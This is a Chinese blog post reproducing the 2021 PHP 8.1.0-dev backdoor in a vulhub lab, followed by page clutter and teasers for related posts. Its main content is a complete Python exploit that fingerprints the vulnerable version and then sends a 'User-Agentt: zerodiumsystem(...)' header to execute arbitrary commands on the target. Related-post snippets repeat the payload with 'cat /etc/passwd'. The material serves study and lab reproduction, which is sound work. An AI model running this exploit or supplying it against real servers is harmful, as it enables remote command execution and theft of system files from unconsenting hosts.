PHP 8.1.0-dev 开发版本后门复现

最新推荐文章于 2024-10-22 16:35:20 发布
最新推荐文章于 2024-10-22 16:35:20 发布
阅读量388 收藏
点赞数
CC 4.0 BY-SA版权
原文链接:https://mp.weixin.qq.com/s/z-KW94nHv834ZL1otQOHZA
本文介绍了PHP 8.1.0-dev开发版本中发现的一个后门,该后门允许攻击者通过修改User-Agent头执行任意代码。详细讲述了如何搭建环境复现漏洞,并提供了Python代码示例来检查目标是否受影响以及执行命令。通过访问本地地址可以查看漏洞效果。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

0x00:简介

PHP 8.1.0-dev 开发版本在2021年3月28日被植入后门,但是后门很快被发现并修正。当受害者使用该后门PHP代码时,攻击者可以通过修改User-Agent头来执行任意代码。

0x01:搭建环境

https://github.com/vulhub/vulhub/tree/master/php/8.1-backdoor

然后访问本地地址

http://127.0.0.1:8080/

0x02:漏洞复现

神秘代码

#!/usr/bin/env python3
import requests
import argparse

from requests.models import parse_header_links 

s = requests.Session()

def checkTarget(args):
    r = s.get(args.url)    
    for h in r.headers.items():
        if "PHP/8.1.0-dev" in h[1]:
            return True
    return False


def execCmd(args):
    r = s.get(args.url, headers={"User-Agentt":"zerodiumsystem(\""+args.cmd+"\");"})
    res = r.text.split("<!DOCTYPE html>")[0]
    if not res:
        print("[-] No Results")
    else:
        print("[+] Results:")
    print(res.strip())


def main():

    parser = argparse.ArgumentParser()
    parser.add_argument("-u", "--url", help="Target URL (Eg: http://127.0.0.1:8080/)", required=True)
    parser.add_argument("-c", "--cmd", help="Command to execute (Eg: ls,id,whoami)", default="id")
    args = parser.parse_args()

    if checkTarget(args):
        execCmd(args)
    else:
        print("[!] Not Vulnerable or url error")
        exit(0)
    
if __name__ == "__main__":
    main()

扫码二维码

获取更多精彩

洛米唯熊

点个在看 你最好看

Jaky5320
关注
PHP-8.1.0-dev 后门命令执行漏洞复现
Shadow_DAI_990101的博客
09-08 3250
想必大家都了解,这里就不过多赘述了没啥可说的,是一个无聊的漏洞。
CTFSHOW和青少年CTFweb刷题
qq_75120258的博客
05-28 955
打开环境后得到这样一句话查看一下源代码,提示我们进行传参,进行命令执行进行传参,确认可以进行命令执行那我们接下来就是用命令执行查找flag发现并没有什么用,题目给了提示需要用到和。
PHP 8.1.0-dev 开发版本后门事件
黑白的博客
05-11 5745
声明 好好学习,天天向上 漏洞描述 PHP 8.1.0-dev 版本在2021年3月28日被植入后门,但是后门很快被发现并清除。当服务器存在该后门时,攻击者可以通过发送User-Agentt头来执行任意代码。 影响范围 PHP 8.1.0-dev 复现过程 这里使用8.1版本 使用vulhub /app/vulhub/vulhub-master/php/8.1-backdoor 使用docker启动 docker-compose build docker-compose up -d 环境启动后,访问 h
PHP/8.1.0-dev 后门命令执行漏洞复现
m0_63253040的博客
09-25 1924
题目描述:题目利用了PHP某一开发版本的重大后门,可以利用某写东西进行代码执行。一开始这里我有个空格在:后面,所以执行不成功,去掉空格就成功了。没有发现什么点,目录扫描也没有结果,打开bp抓包。搜索PHP/8.1.0-dev
2、PHP 8.1.0-dev 后门远程命令执行漏洞复现
weixin_51520483的博客
05-20 768
3、bp抓包发现PHP版本8.1.0-dev。4、尝试使用以前爆出过的漏洞(网上查相关案例)1、青少年ctf,题目PHP后门
PHP 8.1.0-dev后门远程命令执行漏洞
Palpitate_LL的博客
10-22 592
PHP verion 8.1.0-devPHP在服务器上运行,则攻击者可以通过发送User-Agentt标头执行任意代码。
青少年CTF、PHP后门PHP/8.1.0-dev漏洞
weixin_69830800的博客
11-15 2362
题目利用了PHP某一开发版本的重大后门,可以利用某写东西进行代码执行。
PHP 8.1.0-dev后门复现
weixin_46137328的博客
01-18 2245
0x01 简介PHP verion 8.1.0-dev于2021年3月28日被植入后门,但是后门很快被发现并删除。当受害者使用该后门PHP代码时,攻击者可以通过修改User-Agent头来...
PHP 8.1.0-dev 后门远程命令执行漏洞(vulhub)
X_IT666的博客
07-28 1440
漏洞介绍 关于漏洞:PHP 8.1.0-dev 后门远程命令执行漏洞 PHP verion 8.1.0-devPHP在服务器上运行,则攻击者可以通过发送User-Agentt标头执行任意代码。 影响版本PHP 8.1.0-dev 配置环境: 靶机:centos8 攻击机:kali 其他:vulhub -->php–>8.1-backdoor 漏洞攻击思路: 扫描端口,确定开启的服务,漏洞寻找,漏洞利用 信息收集 nmap扫描端口 访问http://192.168
PHP-8.1.0-dev 后门命令执行漏洞复现_zerodiumvar_dump
资深程序员,曾自学JAVA,C#,如今从业于网安行业
12-26 751
如果你也想学习:黑客&网络安全的SQL攻防。
php 开启 ldap,lnmp下php安装ldap扩展
weixin_30915399的博客
03-10 651
今天搭建一个php网站,需要用到php的ldap扩展,搭建服务器环境的时候使用的是lnmp,接下来吾爱编程为大家介绍一下lnmp下php安装ldap扩展的方法,有需要的小伙伴可以参考一下:1、进入到src目录解压指定php的安装包:cd/root/lnmp1.6/srctarjxvfphp-7.2.24.tar.bz22、进入ext扩展目录下的ldap目录:cdphp-7.2.24/ext...
PHP-8.1.0-dev 后门命令执行
逗比大师的博客
08-11 25
PHP 8.1.0-dev 版本在2021年3月28日被植入后门,但是后门很快被发现并清除。当服务器存在该后门时,攻击者可以通过发送User-Agentt头来执行任意代码。 添加请求头 User-Agentt: zerodiumsystem("cat /etc/passwd"); ...
php-8.1.0 开发后门复现
lionwerson的博客
06-02 758
1
vulhub 8.1-backdoor漏洞复现
m0_46371267的博客
02-28 4145
漏洞描述 PHP 8.1.0-dev 版本在2021年3月28日被植入后门,但是后门很快被发现并清除。当服务器存在该后门时,攻击者可以通过发送User-Agentt头来执行任意代码。 漏洞危害 攻击者可以通过user-agent来执行恶意代码获取重要信息。 漏洞等级 高危 ★★★★ 影响范围 PHP 8.1.0-dev 加固方法 建议参考官方公告及时升级或安装相应补丁。 参考链接: https://news-web.php.net/php.internals/113838 https://github.co
PHP8.0正式版的编译安装与使用
热门推荐
小小郭
11-27 1万+
2020-11-26发布了PHP8.0的正式版 介绍下它的安装,并使用laravel对比下PHP7 安装与配置 本次使用的操作系统Ubuntu 18.04.4 LTS 安装 1.准备必要库 apt-get install -y autoconf libxml2-dev libsqlite3-dev \ libcurl4-openssl-dev libssl-dev libonig-dev libtidy-dev zlib1g-dev 2.去官网下载8.0正式版 https://www.php.net/.
自动驾驶决策规划控制:Matlab与Simulink实现S型道路自动换道场景的深度解析 - RNN
最新发布
07-31
自动驾驶决策规划控制的全流程,涵盖从Matlab工具箱的应用到Simulink动态仿真的各个环节。首先,文章介绍了Matlab自动驾驶工具箱的基础功能,随后深入探讨了S型道路自动换道场景的创建方法,重点讲解了RNN和LSTM网络在轨迹预测中的应用以及模糊逻辑推理在换道决策中的作用。接着,文章对四种换道路径进行了对比分析,并通过多目标评价函数筛选最优的B样条曲线。此外,还讨论了如何利用规划路径和预测轨迹建立ST图,并采用动态规划和平滑算法优化ST曲线。最后,文章比较了几种轨迹跟踪算法,并展示了MPC算法的实际应用效果。整个流程通过Simulink平台实现了完整的动态仿真。 适合人群:对自动驾驶技术感兴趣的初学者和技术爱好者,尤其是希望深入了解Matlab和Simulink在自动驾驶领域的应用的研究人员和工程师。 使用场景及目标:①掌握Matlab自动驾驶工具箱的基本操作;②理解RNN、LSTM在网络轨迹预测中的具体应用;③学会使用模糊逻辑推理进行换道决策;④熟悉多种换道路径的选择标准和优化方法;⑤掌握ST图的建立和优化技术;⑥了解不同轨迹跟踪算法的特点并能实际应用。 其他说明:本文不仅提供了理论知识,还结合了大量的实例和代码片段,帮助读者更好地理解和实践自动驾驶技术。
Python库解压指南:frida-8.1.0-py3.5-win-amd64.egg使用
总的来说,“Python库 | frida-8.1.0-py3.5-win-amd64.egg”文件是一个为Python 3.5版本和Windows 64位操作系统构建的Frida动态代码插桩工具库。用户需要将该Egg文件解压到合适的目录,并正确配置Python环境,以便在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值